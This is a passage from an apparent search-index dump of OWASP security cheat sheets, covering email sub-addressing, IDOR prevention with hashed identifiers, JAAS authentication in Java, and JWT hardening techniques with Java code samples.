Many mail providers (such as Microsoft Exchange) do not support sub-addressing. The most notable provider who does is Gmail, although there are many others that also do.

Some users will use a different tag for each website they register on, so that if they start receiving spam to one of the sub-addresses they can identify which website leaked or sold their email address.

Because it could allow users to register multiple accounts with a single email address, some sites may wish to block sub-addressing by stripping out everything between the + and @ signs. This is not generally recommended, as it suggests that the website owner is either unaware of sub-addressing or wishes to prevent users from identifying them when they leak or sell email addresses. Additionally, it can be trivially bypassed by using disposable email addresses, or simply registering multiple email accounts with a trusted provider.

"},{"location":"cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html","title":"Insecure Direct Object Reference Prevention Cheat Sheet","text":""},{"location":"cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Insecure Direct Object Reference (called IDOR from here) occurs when a application exposes a reference to an internal implementation object. Using this method, an IDOR reveals the real identifier and format or pattern used of the element in the storage backend. The most common example is of a record identifier in a storage system such as a database or filesystem, though these are not the only examples.

IDOR is referenced in element A4 of the OWASP Top 10, in the 2013 edition.

"},{"location":"cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html#context","title":"Context","text":"

IDOR does not create a direct security issue itself because, by itself, it reveals only the format or pattern used for the object identifier. However, IDOR brings, depending on the format or pattern in place, a capacity for the attacker to mount an enumeration attack, allowing the attacker to try to probe access to the associated objects.

Enumeration attacks can be described in the way in which the attacker builds a collection of valid identifiers using the discovered format or pattern, and tests them against the application.

For example:

Imagine an HR application exposing a service accepting employee IDs in order to return employee information, and for which the format or pattern of the employee ID is the following:

EMP-00000\nEMP-00001\nEMP-00002\n...\n

Based on this, an attacker can build a collection of valid IDs from EMP-00000 to EMP-99999.

To be exploited, an IDOR issue must be combined with an Access Control issue, because it's the Access Control issue that \"allows\" the attacker to access the object for which they have guessed the identifier through the enumeration attack.

"},{"location":"cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html#additional-remarks","title":"Additional remarks","text":"

From Jeff Williams:

Direct Object Reference is fundamentally a Access Control problem. We split it out to emphasize the difference between URL access control and data layer access control. You can't do anything about the data-layer problems with URL access control. And they're not really input validation problems either. But we see DOR manipulation all the time. If we list only \"Messed-up from the Floor-up Access Control\" then people will probably only put in SiteMinder or JEE declarative access control on URLs and call it a day. That's what we're trying to avoid.

From Eric Sheridan:

An object reference map is first populated with a list of authorized values which are temporarily stored in the session. When the user requests a field (ex: color=654321), the application does a lookup in this map from the session to determine the appropriate column name. If the value does not exist in this limited map, the user is not authorized. Reference maps should not be global (i.e. include every possible value), they are temporary maps/dictionaries that are only ever populated with authorized values.

\"A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter.\"

I'm \"down\" with DOR's for files, directories, etc. But not so much for ALL databases primary keys. That's just insane, like you are suggesting. I think that anytime database primary keys are exposed, an access control rule is required. There is no way to practically DOR all database primary keys in a real enterprise or post-enterprise system.

But, suppose a user has a list of accounts, like a bank where database ID 23456 is their checking account. I'd DOR that in a heartbeat. You need to be prudent about this.

"},{"location":"cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html#objective","title":"Objective","text":"

This article proposes an idea to prevent the exposure of real identifiers in a simple, portable, and stateless way because the proposal needs to handle session and session-less application topologies.

"},{"location":"cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html#proposition","title":"Proposition","text":"

The proposal uses a hash to replace the direct identifier. This hash is salted with a value defined at the application level to support topologies in which the application is deployed in multi-instance mode, such as in production environments.

Using a hash enables the following properties:

This is the implementation of the utility class that generates the the identifier to use for an exchange with the front-end:

import javax.xml.bind.DatatypeConverter;\nimport java.io.UnsupportedEncodingException;\nimport java.security.MessageDigest;\nimport java.security.NoSuchAlgorithmException;\n\n/**\n * Handle the creation of ID that will be send to front end side\n * in order to prevent IDOR\n */\n\npublic class IDORUtil {\n/**\n     * SALT used for the generation of the HASH of the real item identifier\n     * in order to prevent to forge it on front end side.\n     */\nprivate static final String SALT = \"[READ_IT_FROM_APP_CONFIGURATION]\";\n\n/**\n     * Compute a identifier that will be send to the front end and be used as item\n     * unique identifier on client side.\n     *\n     * @param realItemBackendIdentifier Identifier of the item on the backend storage\n     *                                  (real identifier)\n     * @return A string representing the identifier to use\n     * @throws UnsupportedEncodingException If string's byte cannot be obtained\n     * @throws NoSuchAlgorithmException If the hashing algorithm used is not\n     *                                  supported is not available\n     */\npublic static String computeFrontEndIdentifier(String realItemBackendIdentifier)\nthrows NoSuchAlgorithmException, UnsupportedEncodingException {\nString frontEndId = null;\nif (realItemBackendIdentifier != null && !realItemBackendIdentifier.trim().isEmpty()) {\n//Prefix the value with the SALT\nString tmp = SALT + realItemBackendIdentifier;\n//Get and configure message digester\n//We use SHA1 here for the following reason even if SHA1 have now potential collision:\n//1. We do not store sensitive information, just technical ID\n//2. We want that the ID stay short but not guessable\n//3. We want that a maximum of backend storage support the algorithm used in order to compute it in selection query/request\n//If your backend storage supports SHA256 so use it instead of SHA1\nMessageDigest digester = MessageDigest.getInstance(\"sha1\");\n//Compute the hash\nbyte[] hash = digester.digest(tmp.getBytes(\"utf-8\"));\n//Encode is in HEX\nfrontEndId = DatatypeConverter.printHexBinary(hash);\n}\nreturn frontEndId;\n}\n}\n

This is the example of services using the front identifier:

/**\n * Service to list all available movies\n *\n * @return The collection of movies ID and name as JSON response\n */\n@RequestMapping(value = \"/movies\", method = GET, produces = {MediaType.APPLICATION_JSON_VALUE})\npublic Map<String, String> listAllMovies() {\nMap<String, String> result = new HashMap<>();\n\ntry {\nthis.movies.forEach(m -> {\ntry {\n//Compute the front end ID for the current element\nString frontEndId = IDORUtil.computeFrontEndIdentifier(m.getBackendIdentifier());\n//Add the computed ID and the associated item name to the result map\nresult.put(frontEndId, m.getName());\n} catch (Exception e) {\nLOGGER.error(\"Error during ID generation for real ID {}: {}\", m.getBackendIdentifier(),\ne.getMessage());\n}\n});\n} catch (Exception e) {\n//Ensure that in case of error no item is returned\nresult.clear();\nLOGGER.error(\"Error during processing\", e);\n}\n\nreturn result;\n}\n\n/**\n * Service to obtain the information on a specific movie\n *\n * @param id Movie identifier from a front end point of view\n * @return The movie object as JSON response\n */\n@RequestMapping(value = \"/movies/{id}\", method = GET, produces = {MediaType.APPLICATION_JSON_VALUE})\npublic Movie obtainMovieName(@PathVariable(\"id\") String id) {\n\n//Search for the wanted movie information using Front End Identifier\nOptional<Movie> movie = this.movies.stream().filter(m -> {\nboolean match;\ntry {\n//Compute the front end ID for the current element\nString frontEndId = IDORUtil.computeFrontEndIdentifier(m.getBackendIdentifier());\n//Check if the computed ID match the one provided\nmatch = frontEndId.equals(id);\n} catch (Exception e) {\n//Ensure that in case of error no item is returned\nmatch = false;\nLOGGER.error(\"Error during processing\", e);\n}\nreturn match;\n}).findFirst();\n\n//We have marked the Backend Identifier class field as excluded\n//from the serialization\n//So we can send the object to front end through the serializer\nreturn movie.get();\n}\n

This is the value object used:

public class Movie {\n/**\n     * We indicate to serializer that this field must never be serialized\n     *\n     * @see \"https://fasterxml.github.io/jackson-annotations/javadoc/2.5/com/fasterxml/\n     *       jackson/annotation/JsonIgnore.html\"\n     */\n@JsonIgnore\nprivate String backendIdentifier;\n...\n}\n
"},{"location":"cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html#sources-of-the-prototype","title":"Sources of the prototype","text":"

GitHub repository.

"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html","title":"JAAS Cheat Sheet","text":""},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#introduction-what-is-jaas-authentication","title":"Introduction - What is JAAS authentication","text":"

The process of verifying the identity of a user or another system is authentication.

JAAS, as an authentication framework manages the authenticated user's identity and credentials from login to logout.

The JAAS authentication lifecycle:

  1. Create LoginContext.
  2. Read the configuration file for one or more LoginModules to initialize.
  3. Call LoginContext.initialize() for each LoginModule to initialize.
  4. Call LoginContext.login() for each LoginModule.
  5. If login successful then call LoginContext.commit() else call LoginContext.abort()
"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#configuration-file","title":"Configuration file","text":"

The JAAS configuration file contains a LoginModule stanza for each LoginModule available for logging on to the application.

A stanza from a JAAS configuration file:

Branches\n{\n    USNavy.AppLoginModule required\n    debug=true\n    succeeded=true;\n}\n

Note the placement of the semicolons, terminating both LoginModule entries and stanzas.

The word required indicates the LoginContext's login() method must be successful when logging in the user. The LoginModule-specific values debug and succeeded are passed to the LoginModule.

They are defined by the LoginModule and their usage is managed inside the LoginModule. Note, Options are Configured using key-value pairing such as debug=\"true\" and the key and value should be separated by a = sign.

"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#mainjava-the-client","title":"Main.java (The client)","text":"
Java \u2013Djava.security.auth.login.config==packageName/packageName.config\n        packageName.Main Stanza1\n\nWhere:\n    packageName is the directory containing the config file.\n    packageName.config specifies the config file in the Java package, packageName.\n    packageName.Main specifies Main.java in the Java package, packageName.\n    Stanza1 is the name of the stanza Main() should read from the config file.\n
"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#loginmodulejava","title":"LoginModule.java","text":"

A LoginModule must have the following authentication methods:

"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#initialize","title":"initialize()","text":"

In Main(), after the LoginContext reads the correct stanza from the config file, the LoginContext instantiates the LoginModule specified in the stanza.

"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#login","title":"login()","text":"

Captures user supplied login information. The code snippet below declares an array of two callback objects which, when passed to the callbackHandler.handle method in the callbackHandler.java program, will be loaded with a username and password provided interactively by the user:

NameCallback nameCB = new NameCallback(\"Username\");\nPasswordCallback passwordCB = new PasswordCallback (\"Password\", false);\nCallback[] callbacks = new Callback[] { nameCB, passwordCB };\ncallbackHandler.handle (callbacks);\n
"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#commit","title":"commit()","text":"

Once the users credentials are successfully verified during login(), the JAAS authentication framework associates the credentials, as needed, with the subject.

There are two types of credentials, Public and Private:

Principals (i.e. Identities the subject has other than their login name) such as employee number or membership ID in a user group are added to the subject.

Below, is an example commit() method where first, for each group the authenticated user has membership in, the group name is added as a principal to the subject. The subject's username is then added to their public credentials.

Code snippet setting then adding any principals and a public credentials to a subject:

public boolean commit() {\nIf (userAuthenticated) {\nSet groups = UserService.findGroups (username);\nfor (Iterator itr = groups.iterator (); itr.hasNext (); {\nString groupName = (String) itr.next ();\nUserGroupPrincipal group = new UserGroupPrincipal (GroupName);\nsubject.getPrincipals ().add (group);\n}\nUsernameCredential cred = new UsernameCredential (username);\nsubject.getPublicCredentials().add (cred);\n}\n}\n
"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#abort","title":"abort()","text":"

The abort() method is called when authentication doesn't succeed. Before the abort() method exits the LoginModule, care should be taken to reset state including the username and password input fields.

"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#logout","title":"logout()","text":"

The release of the users principals and credentials when LoginContext.logout is called:

public boolean logout() {\nif (!subject.isReadOnly()) {\nSet\u00a0principals\u00a0=\u00a0subject.getPrincipals(UserGroupPrincipal.class);\nsubject.getPrincipals().removeAll(principals);\nSet\u00a0creds\u00a0=\u00a0subject.getPublicCredentials(UsernameCredential.class);\nsubject.getPublicCredentials().removeAll(creds);\nreturn\u00a0true;\n} else {\nreturn false;\n}\n}\n
"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#callbackhandlerjava","title":"CallbackHandler.java","text":"

The callbackHandler is in a source (.java) file separate from any single LoginModule so that it can service a multitude of LoginModules with differing callback objects:

public void handle(Callback[] callbacks) {\nfor (int i = 0; i < callbacks.length; i++) {\nCallback callback = callbacks[i];\nif (callback instanceof NameCallback) {\nNameCallback nameCallBack = (NameCallback) callback;\nnameCallBack.setName(username);\n}  else if (callback instanceof PasswordCallback) {\nPasswordCallback passwordCallBack = (PasswordCallback) callback;\npasswordCallBack.setPassword(password.toCharArray());\n}\n}\n}\n
"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#related-articles","title":"Related Articles","text":""},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#disclosure","title":"Disclosure","text":"

All of the code in the attached JAAS cheat sheet has been copied verbatim from this free source.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html","title":"JSON Web Token Cheat Sheet for Java","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Many applications use JSON Web Tokens (JWT) to allow the client to indicate its identity for further exchange after authentication.

From JWT.IO:

JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed. JWTs can be signed using a secret (with the HMAC algorithm) or a public/private key pair using RSA.

JSON Web Token is used to carry information related to the identity and characteristics (claims) of a client. This information is signed by the server in order for it to detect whether it was tampered with after sending it to the client. This will prevent an attacker from changing the identity or any characteristics (for example, changing the role from simple user to admin or change the client login).

This token is created during authentication (is provided in case of successful authentication) and is verified by the server before any processing. It is used by an application to allow a client to present a token representing the user's \"identity card\" to the server and allow the server to verify the validity and integrity of the token in a secure way, all of this in a stateless and portable approach (portable in the way that client and server technologies can be different including also the transport channel even if HTTP is the most often used).

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#token-structure","title":"Token Structure","text":"

Token structure example taken from JWT.IO:

[Base64(HEADER)].[Base64(PAYLOAD)].[Base64(SIGNATURE)]

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.\neyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.\nTJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ\n

Chunk 1: Header

{\n\"alg\": \"HS256\",\n\"typ\": \"JWT\"\n}\n

Chunk 2: Payload

{\n\"sub\": \"1234567890\",\n\"name\": \"John Doe\",\n\"admin\": true\n}\n

Chunk 3: Signature

HMACSHA256( base64UrlEncode(header) + \".\" + base64UrlEncode(payload), KEY )\n
"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#objective","title":"Objective","text":"

This cheatsheet provides tips to prevent common security issues when using JSON Web Tokens (JWT) with Java.

The tips presented in this article are part of a Java project that was created to show the correct way to handle creation and validation of JSON Web Tokens.

You can find the Java project here, it uses the official JWT library.

In the rest of the article, the term token refers to the JSON Web Tokens (JWT).

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#consideration-about-using-jwt","title":"Consideration about Using JWT","text":"

Even if a JWT token is \"easy\" to use and allow to expose services (mostly REST style) in a stateless way, it's not the solution that fits for all applications because it comes with some caveats, like for example the question of the storage of the token (tackled in this cheatsheet) and others...

If your application does not need to be fully stateless, you can consider using traditional session system provided by all web frameworks and follow the advice from the dedicated session management cheat sheet. However, for stateless applications, when well implemented, it's a good candidate.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#issues","title":"Issues","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#none-hashing-algorithm","title":"None Hashing Algorithm","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#symptom","title":"Symptom","text":"

This attack, described here, occurs when an attacker alters the token and changes the hashing algorithm to indicate, through the none keyword, that the integrity of the token has already been verified. As explained in the link above some libraries treated tokens signed with the none algorithm as a valid token with a verified signature, so an attacker can alter the token claims and the modified token will still be trusted by the application.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#how-to-prevent","title":"How to Prevent","text":"

First, use a JWT library that is not exposed to this vulnerability.

Last, during token validation, explicitly request that the expected algorithm was used.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#implementation-example","title":"Implementation Example","text":"
// HMAC key - Block serialization and storage as String in JVM memory\nprivate transient byte[] keyHMAC = ...;\n\n...\n\n//Create a verification context for the token requesting\n//explicitly the use of the HMAC-256 hashing algorithm\nJWTVerifier verifier = JWT.require(Algorithm.HMAC256(keyHMAC)).build();\n\n//Verify the token, if the verification fail then a exception is thrown\nDecodedJWT decodedToken = verifier.verify(token);\n
"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#token-sidejacking","title":"Token Sidejacking","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#symptom_1","title":"Symptom","text":"

This attack occurs when a token has been intercepted/stolen by an attacker and they use it to gain access to the system using targeted user identity.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#how-to-prevent_1","title":"How to Prevent","text":"

A way to prevent it is to add a \"user context\" in the token. A user context will be composed of the following information:

IP addresses should not be used because there are some legitimate situations in which the IP address can change during the same session. For example, when an user accesses an application through their mobile device and the mobile operator changes during the exchange, then the IP address may (often) change. Moreover, using the IP address can potentially cause issues with European GDPR compliance.

During token validation, if the received token does not contain the right context (for example, if it has been replayed), then it must be rejected.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#implementation-example_1","title":"Implementation example","text":"

Code to create the token after successful authentication.

// HMAC key - Block serialization and storage as String in JVM memory\nprivate transient byte[] keyHMAC = ...;\n// Random data generator\nprivate SecureRandom secureRandom = new SecureRandom();\n\n...\n\n//Generate a random string that will constitute the fingerprint for this user\nbyte[] randomFgp = new byte[50];\nsecureRandom.nextBytes(randomFgp);\nString userFingerprint = DatatypeConverter.printHexBinary(randomFgp);\n\n//Add the fingerprint in a hardened cookie - Add cookie manually because\n//SameSite attribute is not supported by javax.servlet.http.Cookie class\nString fingerprintCookie = \"__Secure-Fgp=\" + userFingerprint\n+ \"; SameSite=Strict; HttpOnly; Secure\";\nresponse.addHeader(\"Set-Cookie\", fingerprintCookie);\n\n//Compute a SHA256 hash of the fingerprint in order to store the\n//fingerprint hash (instead of the raw value) in the token\n//to prevent an XSS to be able to read the fingerprint and\n//set the expected cookie itself\nMessageDigest digest = MessageDigest.getInstance(\"SHA-256\");\nbyte[] userFingerprintDigest = digest.digest(userFingerprint.getBytes(\"utf-8\"));\nString userFingerprintHash = DatatypeConverter.printHexBinary(userFingerprintDigest);\n\n//Create the token with a validity of 15 minutes and client context (fingerprint) information\nCalendar c = Calendar.getInstance();\nDate now = c.getTime();\nc.add(Calendar.MINUTE, 15);\nDate expirationDate = c.getTime();\nMap<String, Object> headerClaims = new HashMap<>();\nheaderClaims.put(\"typ\", \"JWT\");\nString token = JWT.create().withSubject(login)\n.withExpiresAt(expirationDate)\n.withIssuer(this.issuerID)\n.withIssuedAt(now)\n.withNotBefore(now)\n.withClaim(\"userFingerprint\", userFingerprintHash)\n.withHeader(headerClaims)\n.sign(Algorithm.HMAC256(this.keyHMAC));\n

Code to validate the token.

// HMAC key - Block serialization and storage as String in JVM memory\nprivate transient byte[] keyHMAC = ...;\n\n...\n\n//Retrieve the user fingerprint from the dedicated cookie\nString userFingerprint = null;\nif (request.getCookies() != null && request.getCookies().length > 0) {\nList<Cookie> cookies = Arrays.stream(request.getCookies()).collect(Collectors.toList());\nOptional<Cookie> cookie = cookies.stream().filter(c -> \"__Secure-Fgp\"\n.equals(c.getName())).findFirst();\nif (cookie.isPresent()) {\nuserFingerprint = cookie.get().getValue();\n}\n}\n\n//Compute a SHA256 hash of the received fingerprint in cookie in order to compare\n//it to the fingerprint hash stored in the token\nMessageDigest digest = MessageDigest.getInstance(\"SHA-256\");\nbyte[] userFingerprintDigest = digest.digest(userFingerprint.getBytes(\"utf-8\"));\nString userFingerprintHash = DatatypeConverter.printHexBinary(userFingerprintDigest);\n\n//Create a verification context for the token\nJWTVerifier verifier = JWT.require(Algorithm.HMAC256(keyHMAC))\n.withIssuer(issuerID)\n.withClaim(\"userFingerprint\", userFingerprintHash)\n.build();\n\n//Verify the token, if the verification fail then an exception is thrown\nDecodedJWT decodedToken = verifier.verify(token);\n
"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#no-built-in-token-revocation-by-the-user","title":"No Built-In Token Revocation by the User","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#symptom_2","title":"Symptom","text":"

This problem is inherent to JWT because a token only becomes invalid when it expires. The user has no built-in feature to explicitly revoke the validity of a token. This means that if it is stolen, a user cannot revoke the token itself thereby blocking the attacker.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#how-to-prevent_2","title":"How to Prevent","text":"

Since JWT tokens are stateless, There is no session maintained on the server(s) serving client requests. As such, there is no session to invalidate on the server side. A well implemented Token Sidejacking solution (as explained above) should alleviate the need for maintaining block list on server side. This is because a hardened cookie used in the Token Sidejacking can be considered as secure as a session ID used in the traditional session system, and unless both the cookie and the JWT token are intercepted/stolen, the JWT is unusable. A logout can thus be 'simulated' by clearing the JWT from session storage. If the user chooses to close the browser instead, then both the cookie and sessionStorage are cleared automatically.

Another way to protect against this is to implement a token block list that will be used to mimic the \"logout\" feature that exists with traditional session management system.

The block list will keep a digest (SHA-256 encoded in HEX) of the token with a revocation date. This entry must endure at least until the expiration of the token.

When the user wants to \"logout\" then it call a dedicated service that will add the provided user token to the block list resulting in an immediate invalidation of the token for further usage in the application.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#implementation-example_2","title":"Implementation Example","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#block-list-storage","title":"Block List Storage","text":"

A database table with the following structure will be used as the central block list storage.

create table if not exists revoked_token(jwt_token_digest varchar(255) primary key,\nrevocation_date timestamp default now());\n
"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#token-revocation-management","title":"Token Revocation Management","text":"

Code in charge of adding a token to the block list and checking if a token is revoked.

/**\n* Handle the revocation of the token (logout).\n* Use a DB in order to allow multiple instances to check for revoked token\n* and allow cleanup at centralized DB level.\n*/\npublic class TokenRevoker {\n\n/** DB Connection */\n@Resource(\"jdbc/storeDS\")\nprivate DataSource storeDS;\n\n/**\n  * Verify if a digest encoded in HEX of the ciphered token is present\n  * in the revocation table\n  *\n  * @param jwtInHex Token encoded in HEX\n  * @return Presence flag\n  * @throws Exception If any issue occur during communication with DB\n  */\npublic boolean isTokenRevoked(String jwtInHex) throws Exception {\nboolean tokenIsPresent = false;\nif (jwtInHex != null && !jwtInHex.trim().isEmpty()) {\n//Decode the ciphered token\nbyte[] cipheredToken = DatatypeConverter.parseHexBinary(jwtInHex);\n\n//Compute a SHA256 of the ciphered token\nMessageDigest digest = MessageDigest.getInstance(\"SHA-256\");\nbyte[] cipheredTokenDigest = digest.digest(cipheredToken);\nString jwtTokenDigestInHex = DatatypeConverter.printHexBinary(cipheredTokenDigest);\n\n//Search token digest in HEX in DB\ntry (Connection con = this.storeDS.getConnection()) {\nString query = \"select jwt_token_digest from revoked_token where jwt_token_digest = ?\";\ntry (PreparedStatement pStatement = con.prepareStatement(query)) {\npStatement.setString(1, jwtTokenDigestInHex);\ntry (ResultSet rSet = pStatement.executeQuery()) {\ntokenIsPresent = rSet.next();\n}\n}\n}\n}\n\nreturn tokenIsPresent;\n}\n\n\n/**\n  * Add a digest encoded in HEX of the ciphered token to the revocation token table\n  *\n  * @param jwtInHex Token encoded in HEX\n  * @throws Exception If any issue occur during communication with DB\n  */\npublic void revokeToken(String jwtInHex) throws Exception {\nif (jwtInHex != null && !jwtInHex.trim().isEmpty()) {\n//Decode the ciphered token\nbyte[] cipheredToken = DatatypeConverter.parseHexBinary(jwtInHex);\n\n//Compute a SHA256 of the ciphered token\nMessageDigest digest = MessageDigest.getInstance(\"SHA-256\");\nbyte[] cipheredTokenDigest = digest.digest(cipheredToken);\nString jwtTokenDigestInHex = DatatypeConverter.printHexBinary(cipheredTokenDigest);\n\n//Check if the token digest in HEX is already in the DB and add it if it is absent\nif (!this.isTokenRevoked(jwtInHex)) {\ntry (Connection con = this.storeDS.getConnection()) {\nString query = \"insert into revoked_token(jwt_token_digest) values(?)\";\nint insertedRecordCount;\ntry (PreparedStatement pStatement = con.prepareStatement(query)) {\npStatement.setString(1, jwtTokenDigestInHex);\ninsertedRecordCount = pStatement.executeUpdate();\n}\nif (insertedRecordCount != 1) {\nthrow new IllegalStateException(\"Number of inserted record is invalid,\" +\n\" 1 expected but is \" + insertedRecordCount);\n}\n}\n}\n\n}\n}\n
"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#token-information-disclosure","title":"Token Information Disclosure","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#symptom_3","title":"Symptom","text":"

This attack occurs when an attacker has access to a token (or a set of tokens) and extracts information stored in it (the contents of JWT tokens are base64 encoded, but is not encrypted by default) in order to obtain information about the system. Information can be for example the security roles, login format...

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#how-to-prevent_3","title":"How to Prevent","text":"

A way to protect against this attack is to cipher the token using, for example, a symmetric algorithm.

It's also important to protect the ciphered data against attack like Padding Oracle or any other attack using cryptanalysis.

In order to achieve all these goals, the AES-GCM algorithm is used which provides Authenticated Encryption with Associated Data.

More details from here:

AEAD primitive (Authenticated Encryption with Associated Data) provides functionality of symmetric\nauthenticated encryption.\n\nImplementations of this primitive are secure against adaptive chosen ciphertext attacks.\n\nWhen encrypting a plaintext one can optionally provide associated data that should be authenticated\nbut not encrypted.\n\nThat is, the encryption with associated data ensures authenticity (ie. who the sender is) and\nintegrity (ie. data has not been tampered with) of that data, but not its secrecy.\n\nSee RFC5116: https://tools.ietf.org/html/rfc5116\n

Note:

Here ciphering is added mainly to hide internal information but it's very important to remember that the first protection against tampering of the JWT token is the signature. So, the token signature and its verification must be always in place.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#implementation-example_3","title":"Implementation Example","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#token-ciphering","title":"Token Ciphering","text":"

Code in charge of managing the ciphering. Google Tink dedicated crypto library is used to handle ciphering operations in order to use built-in best practices provided by this library.

/**\n * Handle ciphering and deciphering of the token using AES-GCM.\n *\n * @see \"https://github.com/google/tink/blob/master/docs/JAVA-HOWTO.md\"\n */\npublic class TokenCipher {\n\n/**\n     * Constructor - Register AEAD configuration\n     *\n     * @throws Exception If any issue occur during AEAD configuration registration\n     */\npublic TokenCipher() throws Exception {\nAeadConfig.register();\n}\n\n/**\n     * Cipher a JWT\n     *\n     * @param jwt          Token to cipher\n     * @param keysetHandle Pointer to the keyset handle\n     * @return The ciphered version of the token encoded in HEX\n     * @throws Exception If any issue occur during token ciphering operation\n     */\npublic String cipherToken(String jwt, KeysetHandle keysetHandle) throws Exception {\n//Verify parameters\nif (jwt == null || jwt.isEmpty() || keysetHandle == null) {\nthrow new IllegalArgumentException(\"Both parameters must be specified!\");\n}\n\n//Get the primitive\nAead aead = AeadFactory.getPrimitive(keysetHandle);\n\n//Cipher the token\nbyte[] cipheredToken = aead.encrypt(jwt.getBytes(), null);\n\nreturn DatatypeConverter.printHexBinary(cipheredToken);\n}\n\n/**\n     * Decipher a JWT\n     *\n     * @param jwtInHex     Token to decipher encoded in HEX\n     * @param keysetHandle Pointer to the keyset handle\n     * @return The token in clear text\n     * @throws Exception If any issue occur during token deciphering operation\n     */\npublic String decipherToken(String jwtInHex, KeysetHandle keysetHandle) throws Exception {\n//Verify parameters\nif (jwtInHex == null || jwtInHex.isEmpty() || keysetHandle == null) {\nthrow new IllegalArgumentException(\"Both parameters must be specified !\");\n}\n\n//Decode the ciphered token\nbyte[] cipheredToken = DatatypeConverter.parseHexBinary(jwtInHex);\n\n//Get the primitive\nAead aead = AeadFactory.getPrimitive(keysetHandle);\n\n//Decipher the token\nbyte[] decipheredToken = aead.decrypt(cipheredToken, null);\n\nreturn new String(decipheredToken);\n}\n}\n
"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#creation-validation-of-the-token","title":"Creation / Validation of the Token","text":"

Use the token ciphering handler during the creation and the validation of the token.

Load keys (ciphering key was generated and stored using Google Tink) and setup cipher.

//Load keys from configuration text/json files in order to avoid to storing keys as a String in JVM memory\nprivate transient byte[] keyHMAC = Files.readAllBytes(Paths.get(\"src\", \"main\", \"conf\", \"key-hmac.txt\"));\nprivate transient KeysetHandle keyCiphering = CleartextKeysetHandle.read(JsonKeysetReader.withFile(\nPaths.get(\"src\", \"main\", \"conf\", \"key-ciphering.json\").toFile()));\n\n...\n\n//Init token ciphering handler\nTokenCipher tokenCipher = new TokenCipher();\n

Token creation.

//Generate the JWT token using the JWT API...\n//Cipher the token (String JSON representation)\nString cipheredToken = tokenCipher.cipherToken(token, this.keyCiphering);\n//Send the ciphered token encoded in HEX to the client in HTTP response...\n

Token validation.

//Retrieve the ciphered token encoded in HEX from the HTTP request...\n//Decipher the token\nString token = tokenCipher.decipherToken(cipheredToken, this.keyCiphering);\n//Verify the token using the JWT API...\n//Verify access...\n
"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#token-storage-on-client-side","title":"Token Storage on Client Side","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#symptom_4","title":"Symptom","text":"

This occurs when an application stores the token in a manner exhibiting the following behavior:

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#how-to-prevent_4","title":"How to Prevent","text":"
  1. Store the token using the browser sessionStorage container, or use JavaScript closures with private variables
  2. Add it as a Bearer HTTP Authentication header with JavaScript when calling services.
  3. Add fingerprint information to the token.

